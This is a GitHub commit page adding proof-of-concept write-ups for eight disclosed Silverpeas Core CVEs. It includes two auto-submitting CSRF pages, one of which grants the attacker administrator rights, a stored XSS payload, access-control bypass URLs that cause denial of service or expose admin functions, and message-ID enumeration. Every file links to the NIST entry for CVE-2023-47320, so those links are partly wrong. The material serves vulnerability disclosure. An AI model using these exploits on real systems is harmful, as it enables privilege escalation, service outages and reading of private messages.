-
Notifications
You must be signed in to change notification settings - Fork 239
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #9 from TeneBrae93/master
Adding Silverpeas CVEs
- Loading branch information
Showing
10 changed files
with
159 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,16 @@ | ||
| # CVE-2023-47320: Denial of Service via Broken Access Control in Silverpeas Core | ||
|
|
||
| ## Information | ||
| **Description:** This allows denial-of-service by a low privileged user affecting the Silverpeas Core application. <br> | ||
| **Versions Affected:** < 6.3.1 <br> | ||
| **Version Fixed:** 6.3.2 <br> | ||
| **Researcher:** Tyler Ramsbey (https://youtube.com/@TylerRamsbey) | ||
| **Disclosure Link:** https://rhinosecuritylabs.com/blog/ | ||
| **NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2023-47320 | ||
|
|
||
| ## Proof-of-Concept Exploit | ||
| ### Description | ||
| Silverpeas Core 6.3.1 is vulnerable to Incorrect Access Control. An attacker with low privileges is able to execute the administrator-only function of putting the application in "Maintenance Mode" due to broken access control. This makes the application unavailable to all users. | ||
|
|
||
| ### Usage/Exploitation | ||
| After logging in as a low privileged user, go to this URL http://localhost:8080/silverpeas/RjobStartPagePeas/jsp/ActivateMaintenance?allIntranet=1. This places the application in "Maintenance Mode" and makes it unavailable to all users. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,16 @@ | ||
| # CVE-2023-47321: Portlet Deployer Access via Broken Access Control in Silverpeas Core | ||
|
|
||
| ## Information | ||
| **Description:** This allows low privileged users to access the Portlet Deployment tool. <br> | ||
| **Versions Affected:** < 6.3.1 <br> | ||
| **Version Fixed:** 6.3.2 <br> | ||
| **Researcher:** Tyler Ramsbey (https://youtube.com/@TylerRamsbey) | ||
| **Disclosure Link:** https://rhinosecuritylabs.com/blog/ | ||
| **NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2023-47320 | ||
|
|
||
| ## Proof-of-Concept Exploit | ||
| ### Description | ||
| Silverpeas Core 6.3.1 is vulnerable to Incorrect Access Control via the "Portlet Deployet" which allows administrators to deploy .WAR portlets. | ||
|
|
||
| ### Usage/Exploitation | ||
| To exploit this vulnerability, an authenticated user needs to navigate directly to this URL: http://localhost:8080/silverpeas/portletDeployer. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,15 @@ | ||
| <html> | ||
| <body> | ||
| <form action="http://localhost:8080/silverpeas/RjobDomainPeas/jsp/userModify"> | ||
| <input type="hidden" name="Iduser" value="[AttackersID]" /> | ||
| <input type="hidden" name="userLastName" value="[AttackersLastName]" /> | ||
| <input type="hidden" name="userAccessLevel" value="ADMINISTRATOR" /> | ||
| <input type="hidden" name="X-STKN" value="[AttackersSTKNToken]" /> | ||
| <input type="submit" value="Submit request" /> | ||
| </form> | ||
| <script> | ||
| history.pushState('', '', '/'); | ||
| document.forms[0].submit(); | ||
| </script> | ||
| </body> | ||
| </html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,17 @@ | ||
| # CVE-2023-47322: CSRF Leading to Privilege Escalation in Silverpeas Core | ||
|
|
||
| ## Information | ||
| **Description:** The "userModify" request is vulnerable to Cross Site Request Forgery (CSRF) leading to privilege escalation. <br> | ||
| **Versions Affected:** < 6.3.1 <br> | ||
| **Version Fixed:** 6.3.2 <br> | ||
| **Researcher:** Tyler Ramsbey (https://youtube.com/@TylerRamsbey) | ||
| **Disclosure Link:** https://rhinosecuritylabs.com/blog/ | ||
| **NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2023-47320 | ||
|
|
||
| ## Proof-of-Concept Exploit | ||
| ### Description | ||
| The "userModify" feature of Silverpeas Core 6.3.1 is vulnerable to Cross Site Request Forgery (CSRF) leading to privilege escalation. If an administrator goes to a malicious URL while being authenticated to the Silverpeas application, the CSRF will execute making the attacker and administrator user in the application. | ||
|
|
||
| ### Usage/Exploitation | ||
| To exploit this vulnerability, an attacker must host ```CVE-2023-47322.html``` on an attacker-controlled web server. When an authenticated administrator goes to the attacker's website, the CSRF will execute making the attacker an administrator. | ||
|
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,16 @@ | ||
| # CVE-2023-47323: Broken Access Control Allows Reading All Messages in Silverpeas Core | ||
|
|
||
| ## Information | ||
| **Description:** The notification/messaging feature does not enforce access control on the ID parameter, allowing any user to read all messages (including admin-only messages). <br> | ||
| **Versions Affected:** < 6.3.1 <br> | ||
| **Version Fixed:** 6.3.2 <br> | ||
| **Researcher:** Tyler Ramsbey (https://youtube.com/@TylerRamsbey) | ||
| **Disclosure Link:** https://rhinosecuritylabs.com/blog/ | ||
| **NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2023-47320 | ||
|
|
||
| ## Proof-of-Concept Exploit | ||
| ### Description | ||
| The notification/messaging feature of Silverpeas Core 6.3.1 does not enforce access control on the ID parameter. This allows an attacker to read all messages sent between other users; including those sent only to administrators. | ||
|
|
||
| ### Usage/Exploitation | ||
| To exploit this vulnerability, an attacker can use a script or Burp Suite Intruder to view all messages by attacking the ID parameter in this URL: http://localhost:8080/silverpeas/RSILVERMAIL/jsp/ReadMessage.jsp?ID=[messageID] - the messages begin at "1" and increase in intervals of 1. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,16 @@ | ||
| # CVE-2023-47324: Stored XSS in Messages affecting Silverpeas Core | ||
|
|
||
| ## Information | ||
| **Description:** The messaging feature of Silverpeas Core is vulnerable to Stored Cross-Site Scripting (XSS). <br> | ||
| **Versions Affected:** < 6.3.1 <br> | ||
| **Version Fixed:** 6.3.2 <br> | ||
| **Researcher:** Tyler Ramsbey (https://youtube.com/@TylerRamsbey) | ||
| **Disclosure Link:** https://rhinosecuritylabs.com/blog/ | ||
| **NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2023-47320 | ||
|
|
||
| ## Proof-of-Concept Exploit | ||
| ### Description | ||
| The notification/messaging feature of Silverpeas Core 6.3.1 is vulnerable to Stored Cross-Site Scripting (XSS). | ||
|
|
||
| ### Usage/Exploitation | ||
| To exploit this vulnerability, the following payload can be sent in a message to another user: ```<img/src/onerror=prompt(1)>```. When the user opens it, it successfully executes Javascript in the user's browser. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,16 @@ | ||
| # CVE-2023-47325: Broken Access Control on the "Bin" Allows Modification of Deleted Spaces in Silverpeas Core | ||
|
|
||
| ## Information | ||
| **Description:** Broken Access Control on the "Bin" allows low privileged users to access and modify deleted spaces in Silverpeas Core. <br> | ||
| **Versions Affected:** < 6.3.1 <br> | ||
| **Version Fixed:** 6.3.2 <br> | ||
| **Researcher:** Tyler Ramsbey (https://youtube.com/@TylerRamsbey) | ||
| **Disclosure Link:** https://rhinosecuritylabs.com/blog/ | ||
| **NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2023-47320 | ||
|
|
||
| ## Proof-of-Concept Exploit | ||
| ### Description | ||
| The administrative "Bin" feature in Silverpeas Core 6.3.1 is affected by broken access control. A user with low privileges is able to navigate directly to the bin, revealing all deleted spaces. The user can then restore or permanently delete the spaces. | ||
|
|
||
| ### Usage/Exploitation | ||
| To exploit this vulnerability, an authenticated user needs to navigate directly to this URL: http://localhost:8080/silverpeas/RjobStartPagePeas/jsp/ViewBin. The bin successfully renders revealing all deleted spaces. The low privileged user can then restore or permanently delete the spaces. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,15 @@ | ||
| <html> | ||
| <body> | ||
| <form action="http://localhost:8080/silverpeas/RjobDomainPeas/jsp/domainSQLCreate"> | ||
| <input type="hidden" name="domainName" value="Created-By-CSRF" /> | ||
| <input type="hidden" name="domainDescription" value="" /> | ||
| <input type="hidden" name="silverpeasServerURL" value="http://localhost:8080/silverpeas" /> | ||
| <input type="hidden" name="X-STKN" value="[AttackerSTKNToken]" /> | ||
| <input type="submit" value="Submit request" /> | ||
| </form> | ||
| <script> | ||
| history.pushState('', '', '/'); | ||
| document.forms[0].submit(); | ||
| </script> | ||
| </body> | ||
| </html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,16 @@ | ||
| # CVE-2023-47326: Domain Creation is vulnerable to CSRF in Silverpeas Core | ||
|
|
||
| ## Information | ||
| **Description:** Silverpeas Core is vulnerable to Cross Site Request Forgery (CSRF) via the Domain SQL Create function. <br> | ||
| **Versions Affected:** < 6.3.1 <br> | ||
| **Version Fixed:** 6.3.2 <br> | ||
| **Researcher:** Tyler Ramsbey (https://youtube.com/@TylerRamsbey) | ||
| **Disclosure Link:** https://rhinosecuritylabs.com/blog/ | ||
| **NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2023-47320 | ||
|
|
||
| ## Proof-of-Concept Exploit | ||
| ### Description | ||
| Silverpeas Core is vulnerable to Cross Site Request Forgery (CSRF) via the Domain SQL Create function. If an attacker clicks a malicious URL while authenticated to Silverpeas Core, the CSRF payload will create additional domains for authentication. | ||
|
|
||
| ### Usage/Exploitation | ||
| To exploit this vulnerability, an attacker must direct an administrator to a URL that loads the ```CVE-2023-47326.html``` file. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,16 @@ | ||
| # CVE-2023-47327: The Space Create Function in Silverpeas Core is vulnerable to Broken Access Control | ||
|
|
||
| ## Information | ||
| **Description:** The "create a space" feature in Silverpeas Core suffers from broken access control, allowing any user to create a space regardless of permissions. <br> | ||
| **Versions Affected:** < 6.3.1 <br> | ||
| **Version Fixed:** 6.3.2 <br> | ||
| **Researcher:** Tyler Ramsbey (https://youtube.com/@TylerRamsbey) | ||
| **Disclosure Link:** https://rhinosecuritylabs.com/blog/ | ||
| **NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2023-47320 | ||
|
|
||
| ## Proof-of-Concept Exploit | ||
| ### Description | ||
| The "create a space" feature in Silverpeas Core is reserved for administrator use. This feature suffers from Broken Access Control, allowing any authenticated user to create a space by navigating directly to the correct URL. | ||
|
|
||
| ### Usage/Exploitation | ||
| To exploit this vulnerability, an attacker with low privileges needs to navigate directly to this URL with their X-STKN token: http://localhost:8080/silverpeas/RjobStartPagePeas/jsp/CreateSpace?X-STKN=[Users-STKN-Token]. The attacker can then type in a name and description and click "Ok" and the space is successfully created. |